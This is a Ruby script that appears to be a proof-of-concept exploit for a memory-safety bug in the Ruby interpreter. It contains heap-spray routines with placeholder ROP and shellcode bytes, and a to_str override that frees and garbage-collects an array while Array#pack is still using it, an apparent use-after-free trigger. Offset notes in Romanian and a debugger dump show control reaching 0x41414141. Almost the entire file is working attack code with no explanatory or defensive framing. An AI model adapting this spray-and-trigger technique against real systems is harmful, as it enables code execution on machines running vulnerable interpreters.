$global_array = Array.new(100)
#7FB07 len of str necesar sa align blocks pt precise va blocks spray
#0bec offset pt 0c0c0c0c
#inainte formula era : "A"*0x2a902+"D" =>0x2a903 len final

def spray
	final_payload 	= ""
	offset 	  		= 0xbec
	junk 	  		= "2020"
	rop  	  		= "4141424243434444454546464747"
	shellcode 		= "0c0c00c0c0c0c0c0c0c0c0c0c0c0"
	
	while junk.length < 0x10000 
		junk += junk;
	end
	
	final_payload = junk[0,offset]
	
	final_payload += rop
	final_payload += shellcode 
	final_payload += junk[0,0x10000-offset-rop.length-shellcode.length]
	
	
	while final_payload.length < 0x80000
		final_payload += final_payload
	end
	
	for i in 0...99 do
		$global_array[i] = String.new(final_payload[0,0x7fb00])
	end
	
	for i in 0...99 do
		$global_array[i] = String.new(final_payload[0,0x7fb00])
	end
	
	for i in 0...99 do
		$global_array[i] = String.new(final_payload[0,0x7fb00])
	end
end

=begin

0:000> dd 41414141
41414141  534f4c41 41414141 46414141 46464646
41414151  46464646 30334242 33303330 54303330
41414161  534f4c41 41414141 46414141 46464646
41414171  46464646 30334242 33303330 54303330
41414181  534f4c41 41414141 46414141 46464646
41414191  46464646 30334242 33303330 54303330
414141a1  534f4c41 41414141 46414141 46464646
414141b1  46464646 30334242 33303330 54303330

=end

for i in 0...350 do
	spray
	sleep 10
end

class MyObject
    def to_str
	    $a.clear()
	    $a = nil
		#63306330 
		x = "\x54\x41\x4C\x4F\x53\x0c\x0c\x0c\x0c\x41\x41\x41\x46\x46\x46\x46\x46\x46\x46\x46\x46\x42\x42\x33\x30\x30\x33\x30\x33\x30\x33\x30"*800
	    GC.start
		for i in 0...99 do
			a = String.new(x*(0x2100))
		end
	    return "talos"
    end
end


$a = []

$a.push(MyObject.new())
$a.push(".")

puts $a.pack("AA")

#63f4a630          
#s -a 0x0 L?8000000